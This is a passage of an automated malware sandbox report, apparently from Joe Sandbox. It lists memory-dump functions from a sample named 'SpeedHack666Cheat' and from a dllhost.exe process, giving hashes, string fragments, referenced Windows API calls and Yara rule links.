Opcode ID: d6afa10cd3b8d7067c9bd1a3d8df7645acbf83d595103f4219dcee5cf1968b08
Instruction ID: c1a9d37abafbb1f137188b69021ac2f2d8bfbf906561f22dac1a5833155335cb
Opcode Fuzzy Hash: d6afa10cd3b8d7067c9bd1a3d8df7645acbf83d595103f4219dcee5cf1968b08
Instruction Fuzzy Hash: 8E90023105860D8B464127B57809555B75C95449157808051A50D416225A75E9165695

Function 00B5F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1484c6c94d89c6348656cf95ccac3e8cfd9aaab9606f884b8a4164742d104604
Instruction ID: 5559a6aeb8dcfba8a5b07d89be9649e23eef95a787736e9bf1752440fa27ef16
Opcode Fuzzy Hash: 1484c6c94d89c6348656cf95ccac3e8cfd9aaab9606f884b8a4164742d104604
Instruction Fuzzy Hash: 8F90023349860E8B458427A57909566775C95445157C00055A50D516225E55641056A9

Function 00B5F718 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c973ef489534007d770ff5ee22684edc259effb78de38c416847509c63392d
Instruction ID: 78a24ee54de588c6940f29d22e79c22282a74f0632238a95fa07df8fed51df7f
Opcode Fuzzy Hash: 09c973ef489534007d770ff5ee22684edc259effb78de38c416847509c63392d
Instruction Fuzzy Hash:

Function 04A50EF0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80e87c545aa6b8b429a66bd5a0f3820a412b45f7c0e5e9d16c942d508b3b84f
Instruction ID: 387e12a5dd14e9babe0e661df0acc96b519aa8bf9dbaa7a38a35e4fe879028bd
Opcode Fuzzy Hash: b80e87c545aa6b8b429a66bd5a0f3820a412b45f7c0e5e9d16c942d508b3b84f
Instruction Fuzzy Hash: 15900231068B0C8BC64037D57909595775DA5455157C50055B50D81A216A5564145695

Function 04A523C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2eed278703a4d059e64bb660fd9a10070fb42147cb1e9b8da8934441d76e05b
Instruction ID: 937c74719ef94aba38e91b0bd53f1ee4b19dfd85a64a4a837147fb4f3014597d
Opcode Fuzzy Hash: d2eed278703a4d059e64bb660fd9a10070fb42147cb1e9b8da8934441d76e05b
Instruction Fuzzy Hash:

Function 04A50ED0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ceab117c38076de735dd32931ccf7f39bbaa19c60faa613255b102365b18e87
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: 0ceab117c38076de735dd32931ccf7f39bbaa19c60faa613255b102365b18e87
Instruction Fuzzy Hash:

Function 04A52468 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eaa5678667b78e26ee155a4b97b6ab6d0fe4ea4024c1037fe36cc01e9c87a01
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 9eaa5678667b78e26ee155a4b97b6ab6d0fe4ea4024c1037fe36cc01e9c87a01
Instruction Fuzzy Hash:

Non-executed Functions

Function 04A51602 Relevance: 6.3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

Strings

!, xrefs: 04A51653
2|l, xrefs: 04A51626
:@Ul, xrefs: 04A517E8
5Oll^, xrefs: 04A51612, 04A51617
:@Ul, xrefs: 04A5191A

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: !$:@Ul$:@Ul$2|l$5Oll^
API String ID: 0-1307156471
Opcode ID: 550b3fda5844ff17dc9f098bdb216ac4e4665d0f6f12504e086ddd9bf285b5fd
Instruction ID: c1a4bd6cc5cc6526d4822165bccf7889c349b0419b15fac240d429d0ee46ffcf
Opcode Fuzzy Hash: 550b3fda5844ff17dc9f098bdb216ac4e4665d0f6f12504e086ddd9bf285b5fd
Instruction Fuzzy Hash: 29317AB4A042198BDBA4EF60CD49BED77B2BF84300F4080AAA90A6B7D0CF705D85DF11

Analysis Process: dllhost.exePID: 5336, Parent PID: 6780COMMON

Execution Graph

Execution Coverage:	18.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.1%
Total number of Nodes:	337
Total number of Limit Nodes:	13

Executed Functions

Function 04BC3C90 Relevance: 3.0, Strings: 2, Instructions: 547COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC40B8
f`Zl, xrefs: 04BC3DF1

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$f`Zl
API String ID: 0-484173736
Opcode ID: d02951d5581a385daca3d134a4c51da0822ffa1f2799752b42495af889175da7
Instruction ID: bbff3dae6aa29719a4f5baf41fd87f26c92a848443283af899fd6bfa260a091e
Opcode Fuzzy Hash: d02951d5581a385daca3d134a4c51da0822ffa1f2799752b42495af889175da7
Instruction Fuzzy Hash: 8012F374B00210CBEB04EB74D8A936D77A2FB89304F5585BAD906DB394EF34AD51CB92

Function 0083B32F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0083B3AF

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 21494f6325ce3b93f010d6e39558ec8a4a908662fab0fd0a866b9da5c3f91864
Instruction ID: 72b2f3322a0944578b9bd9ce39a2b2b81c92f65b3d8a815b01d2adb6bc986996
Opcode Fuzzy Hash: 21494f6325ce3b93f010d6e39558ec8a4a908662fab0fd0a866b9da5c3f91864
Instruction Fuzzy Hash: AD21D3B55097809FDB128F25DC40B52BFF4EF46310F0884DAE985CB163D331A808CBA1

Function 0083B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0083B51D

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 287af687852f5280933d4eced0b1d8128b3f33785b8bc7baa61c09dc30fc2feb
Instruction ID: f1e8a71226d3ff0a9f569b90aa377d33547c4668111e83f417adc5d0ccd087a8
Opcode Fuzzy Hash: 287af687852f5280933d4eced0b1d8128b3f33785b8bc7baa61c09dc30fc2feb
Instruction Fuzzy Hash: DA119D724093C09FDB228F15DC45A52FFB4FF56324F0980DAE9848B663D275A918CB72

Function 0083B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0083B3AF

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4e641090b20e8224552e32f0962e15b5786d03043c80f58174d3de79cc0c1dad
Instruction ID: 016d2c3647769d3e8abeb560bb96bc63bd982fb5412bab8389507d69cd40c1a6
Opcode Fuzzy Hash: 4e641090b20e8224552e32f0962e15b5786d03043c80f58174d3de79cc0c1dad
Instruction Fuzzy Hash: F811A0715046049FEB20CF55D984B56FBE4FF44320F08C8AAEE45CB652D332E814DBA1

Function 068606AC Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 06860709

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: InformationProcess
String ID:
API String ID: 1801817001-0
Opcode ID: 9e5a3c4d5f1c56f27327a3a20f8f7b897f5b831a8b5e8830a1653dabb8198b34
Instruction ID: 12d61dfbaa3f8c1e64e946bab994d6a12afec1bad7da2d96f75d72b99585805b
Opcode Fuzzy Hash: 9e5a3c4d5f1c56f27327a3a20f8f7b897f5b831a8b5e8830a1653dabb8198b34
Instruction Fuzzy Hash: 9511A3754083809FDB228F15DD45F52FFF4EF46210F09849AED844B563D275A918CB61

Function 0083B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0083B51D

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: c91297b032ece2ccc9539f30b6dc4cd4a04033b8ee34a18fb2e71e3593205700
Instruction ID: b554cf09e95030eeeca3d4b8f71a3f41177be81efff4740ae7c98f39bab7a6a5
Opcode Fuzzy Hash: c91297b032ece2ccc9539f30b6dc4cd4a04033b8ee34a18fb2e71e3593205700
Instruction Fuzzy Hash: 4E01A2B54042449FEB218F05D945B61FBE0FF58724F08C49AEE494B652D376E818DFB2

Function 068606CE Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 06860709

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: InformationProcess
String ID:
API String ID: 1801817001-0
Opcode ID: 16463f042874608c09f3e6739aa85881116b99d062701b0e5f07236ca2d05cdd
Instruction ID: 257e3c0e02669b5bc7e4e1b510e2bd1395accc55fbe0898038481953cd494fd3
Opcode Fuzzy Hash: 16463f042874608c09f3e6739aa85881116b99d062701b0e5f07236ca2d05cdd
Instruction Fuzzy Hash: 6F01A2754042449FEB618F06DA45B65FBF4EF08724F08C49AEE494B652D376A418CFB2

Function 0485DDB2 Relevance: 10.2, Strings: 8, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\B|l, xrefs: 0485DE58
\B|l, xrefs: 0485DE85
\B|l, xrefs: 0485DE48
\B|l, xrefs: 0485DE95
\B|l, xrefs: 0485DED1
\B|l, xrefs: 0485DF28
\B|l, xrefs: 0485DEC1
\B|l, xrefs: 0485DF18

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: \B|l$\B|l$\B|l$\B|l$\B|l$\B|l$\B|l$\B|l
API String ID: 0-3997597086
Opcode ID: d8f00b9870dde4840721c96bb45227a745844babfab418c740343d2681ab145a
Instruction ID: a832938e03a3d1b443a6ea5be927eea8ae1079f5671c42ba3818b2a5f64834f5
Opcode Fuzzy Hash: d8f00b9870dde4840721c96bb45227a745844babfab418c740343d2681ab145a
Instruction Fuzzy Hash: 1A510931B01104CFCB14DBA5D658AED77F2AF89305B2185A9DC06EB765EB32AD01CB61

Function 04BC151A Relevance: 5.1, Strings: 4, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
!, xrefs: 04BC156B
2|l, xrefs: 04BC153E

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: !$:@Ul$:@Ul$2|l
API String ID: 0-3251782673
Opcode ID: 86b4db786c710d0e88e6c9bdf955c7a773565b3a217cde7e5a1fa2963b8b01b5
Instruction ID: aec99017a938e61a69f1ad92ec3a09929075ebb52715d12fbc9172e7a55d3a0d
Opcode Fuzzy Hash: 86b4db786c710d0e88e6c9bdf955c7a773565b3a217cde7e5a1fa2963b8b01b5
Instruction Fuzzy Hash: 54315874A00219CBDB64DF68CD99BED77B2FB89300F0080A9990AAB795DF705D81DF51

Function 04BC1011 Relevance: 4.1, Strings: 3, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
:@Ul, xrefs: 04BC1B99

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: 2ace48a5d28ef9527bd0722edaab975d8adba2c83e9ce1d78e15df3f3b321f43
Instruction ID: 11a9a8cf511206e2fa1860ad36226c7acdd5b8733cce3835a39b64855ae02544
Opcode Fuzzy Hash: 2ace48a5d28ef9527bd0722edaab975d8adba2c83e9ce1d78e15df3f3b321f43
Instruction Fuzzy Hash: BF020A78A00218CFEB54DF64DC987ADB7B2FB49300F5045A9D90AAB3A5DB706D80CF51

Function 0485E54F Relevance: 3.9, Strings: 3, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2|l, xrefs: 0485E788
!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l$2|l
API String ID: 0-2507312674
Opcode ID: 70be8b88087cea7a7710c2bb8f5e487185caca09855e9f61364d6d7bcec82e0c
Instruction ID: 37546b52e4f2d33edb9a64eb11a065381964bf7d2ec6b533e6b29b0ca86ec1f5
Opcode Fuzzy Hash: 70be8b88087cea7a7710c2bb8f5e487185caca09855e9f61364d6d7bcec82e0c
Instruction Fuzzy Hash: 7F511B74A04608CFEB14DFB4DD987BCBBB2BB45309F104965E90AD7261EB706A84CF52

Function 04BC14D7 Relevance: 3.9, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
:@Ul, xrefs: 04BC1B99

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: dc03b0a75980128e2ef081de92292c21c3bbae426dd036fdb140fb52049de4db
Instruction ID: 4eddc25021d1ccb670c83eddbc612939d0913d41b2515786bdb0883d33b9d3fa
Opcode Fuzzy Hash: dc03b0a75980128e2ef081de92292c21c3bbae426dd036fdb140fb52049de4db
Instruction Fuzzy Hash: F5410774A00218CFEB64DF28CC957EDB7B2BF86304F4084AA994AAB295DF745D81CF51

Function 04BC17E1 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
:@Ul, xrefs: 04BC1B99

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: d9277b1a4ffb331f0689dd81cedaf0d5974550f91172e5fe6a4730e884c0b8e1
Instruction ID: 12c05536d4345c1b5d7c2cf3217ee02ea1ad32f8644ab9db734fb59fa5225f66
Opcode Fuzzy Hash: d9277b1a4ffb331f0689dd81cedaf0d5974550f91172e5fe6a4730e884c0b8e1
Instruction Fuzzy Hash: 54413C74A00218CBEB58DF28CC957ED77B2BF89304F4085AA990AAB395DF745D81CF11

Function 04BC1345 Relevance: 3.8, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC134A
:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: 57ed8dd790da2a36bb124c5c1e2497dacaf6c15b8b16d46e67de9dda57fe533a
Instruction ID: b4e05f3eb6d369af6d0217daa73c2b54dcee32b15376a1fb4e38de601cface22
Opcode Fuzzy Hash: 57ed8dd790da2a36bb124c5c1e2497dacaf6c15b8b16d46e67de9dda57fe533a
Instruction Fuzzy Hash: 7E415174A002188BEB54EF68CD997ED77B2FF89304F0044A99A4AAB395DFB45D81CF11

Function 04BC14D2 Relevance: 3.8, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
:@Ul, xrefs: 04BC1B99

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: 9e10d796535976a70cfd263878dc0d8076d6decc2dbcd927e9e8f5c6a317bbac
Instruction ID: b42e7563ff9433feec5e9521e1d71324a072224ed95ba925220a4fcb7b4d08b0
Opcode Fuzzy Hash: 9e10d796535976a70cfd263878dc0d8076d6decc2dbcd927e9e8f5c6a317bbac
Instruction Fuzzy Hash: 5D313B74A00218CBEB58DF24CC957ED77B2FF89304F4084AAA94AAB295DFB45D81CF51

Function 04BC1577 Relevance: 3.8, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
:@Ul, xrefs: 04BC1B99

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: 7b026bbec87678d0705be1597b27601c0ced91f9e361082632660e6b25a2e4d4
Instruction ID: b42e7563ff9433feec5e9521e1d71324a072224ed95ba925220a4fcb7b4d08b0
Opcode Fuzzy Hash: 7b026bbec87678d0705be1597b27601c0ced91f9e361082632660e6b25a2e4d4
Instruction Fuzzy Hash: 5D313B74A00218CBEB58DF24CC957ED77B2FF89304F4084AAA94AAB295DFB45D81CF51

Function 04BC160D Relevance: 3.8, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832
:@Ul, xrefs: 04BC1B99

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: ba2b83064f22bc6be0ddda411c60e2d46b68f42f5c69768e19fd6ae17cd0a6e4
Instruction ID: 8c48d62971928044fe20f7cd4e233b6eea5d17722f2b692ab4b2f8d50ec45862
Opcode Fuzzy Hash: ba2b83064f22bc6be0ddda411c60e2d46b68f42f5c69768e19fd6ae17cd0a6e4
Instruction Fuzzy Hash: A5313D74A00218CBEB58DF24CC957ED77B2FF89304F4084AAA94AAB295DFB45D81CF51

Function 04BC164F Relevance: 3.8, Strings: 3, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1654
:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: 7dec0289ac2f28f176f39cf6847a8a726241df6f739a2a24b9caf013c1474995
Instruction ID: 891d6a838d1b85211f6da44bb3b3dbce60079627306ef0ddbe2cad73264a1421
Opcode Fuzzy Hash: 7dec0289ac2f28f176f39cf6847a8a726241df6f739a2a24b9caf013c1474995
Instruction Fuzzy Hash: FF311E74A00218CBEB54DF24CC957ED77B2FB89304F5084A9994AAB295CFB55D81CF11

Function 04BC188D Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1892
:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: 871332d216f9437dd5d22f068a76c4e39e5457661eb5d0f91749bb9e417b04f4
Instruction ID: 08821da7ce41dcd306f5a685d7d322e0e7c01b4a3239256e49966eaac0d7f4ce
Opcode Fuzzy Hash: 871332d216f9437dd5d22f068a76c4e39e5457661eb5d0f91749bb9e417b04f4
Instruction Fuzzy Hash: 0B315E74A002188BEB58DF64CC957ED77B2FB89300F4080AAA94AAB2D5CFB45D81CF51

Function 04BC1C59 Relevance: 2.7, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul
API String ID: 0-584387997
Opcode ID: 955cc1688cb86902a9c3fbe39ddaca21855372d7b3c49b285942324f18fdbd7c
Instruction ID: 23ab34be01c64a843d543789e551afe8681b60157a5481d2bfecbb4a621e5e9b
Opcode Fuzzy Hash: 955cc1688cb86902a9c3fbe39ddaca21855372d7b3c49b285942324f18fdbd7c
Instruction Fuzzy Hash: F691F878A00218CFDB64EF68D8987ED77B2BB89304F5045A9990AE73A5DF706D80CF51

Function 0485E692 Relevance: 2.6, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: dda5e89c66fca5006a396265b411fedbb9eaf42367e6a989d7b0aa36de6006db
Instruction ID: 7da81a80a808504619ca8d805428f020d64f46044ad01c5d96630097fb73dae0
Opcode Fuzzy Hash: dda5e89c66fca5006a396265b411fedbb9eaf42367e6a989d7b0aa36de6006db
Instruction Fuzzy Hash: CD510E74A04608CBEB14EFA4DD987BCBBB1FF45309F104965E80AD7261EB746A44CF52

Function 0485E8D7 Relevance: 2.6, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: fe4dfb8847817202628ac494fc7062fa1e598988e744e172169c050579d3306f
Instruction ID: 857595ab3f85c6221aeddb9e8c63490450be06a3a3e9c727fbbf1ea6c3b80c0c
Opcode Fuzzy Hash: fe4dfb8847817202628ac494fc7062fa1e598988e744e172169c050579d3306f
Instruction Fuzzy Hash: 00510C74A04608CFEB14DFB4DD887BDBAB1BF45319F104A65E80AD7261EB746A44CF12

Function 0485E47B Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: e932498fdadecb79536954868fdca9d7aae19259c976e83ca1a3878cc349d6fd
Instruction ID: dd9b5af787339ea8ec65aa97448d8681e7142f5fce44e7da76c6d52d0ac9e5b7
Opcode Fuzzy Hash: e932498fdadecb79536954868fdca9d7aae19259c976e83ca1a3878cc349d6fd
Instruction Fuzzy Hash: 0C510D74A04609CFEB14DFA4DD887ADBBB2BB45309F104969E80AD7264EB706A44CF52

Function 0485E70F Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 068d90292cafa2d6dfc03d10e57e487b25009beceedc68ff37d89360d8361b8a
Instruction ID: dd3f22299ea2192c2cee3167596be01c46e5f8ec26cf6dee1628b84dcbed0281
Opcode Fuzzy Hash: 068d90292cafa2d6dfc03d10e57e487b25009beceedc68ff37d89360d8361b8a
